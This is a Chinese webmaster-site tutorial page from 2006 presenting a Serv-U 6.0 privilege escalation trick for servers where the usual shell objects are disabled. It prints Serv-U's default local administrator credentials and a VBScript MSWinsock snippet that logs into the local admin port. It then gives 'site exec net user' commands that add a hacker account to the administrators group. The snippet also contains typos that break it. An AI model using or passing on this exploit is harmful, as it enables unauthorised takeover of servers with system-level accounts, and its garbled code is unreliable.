Serv-u6.0提权新招 - 源码狐 - 站长助手

栏目导航

热门教程

相关教程

Serv-u6.0提权新招 [收藏本页]

作者：无从考证来源：本站整理发布时间：2006-7-1 6:49:09
适用环境：服务器禁用FSO，关掉Wscript.shelll,没有执行权限。

限制：没有更改管理员的密码，或者破解出了Serv-U的管理员的密码。Serv-U默认用户名：localadministrator 密码：#|@$ak#.|k;0@p 下面用MSWinsock。Winsock建立一个连接，并且以System权限添加超级用户，代码如下：
Dim revdata

Dim sendata

Set sock=createobject("MSWinsock.Winsock")

Sock.protocol=0

Sock.connect "127.0.0.1",43958

Sendata="LocalAdministrator"& chr(10) &chr(13)

Sock.senddata snedata

Sendata="#|@$ak#.|k;0@p" &chr(10) &chr(13)

Sock.senddata.sendata

使用这个代码就可以连上FTP了，接下来用Sock.senddata sendata 发送添加有执行权限用户的命令，想必大家该知道怎么做了吧，对了，就是用"site exec net user hacker hacker /add" "site exec net localgroup administrators hacker /add"
[] [返回上一页] [打印] [收藏]
上一篇教程：ASP漏洞全接触-入门篇下一篇教程：ftp使用经典

Copyright © 2003-2008 站长助手 www.web162.com
辽ICP备05001760号网络实名:站长助手 转载本站原创教程请注名来源于本站
力倡站长资源文化,崇尚互联共享,做中国最好站长网站,为中国网站提供动力！
始建于2003-3-1 8:10 中国首都·北京辽宁(分站)

主资源渠道辽宁电信分公司服务器组及带宽！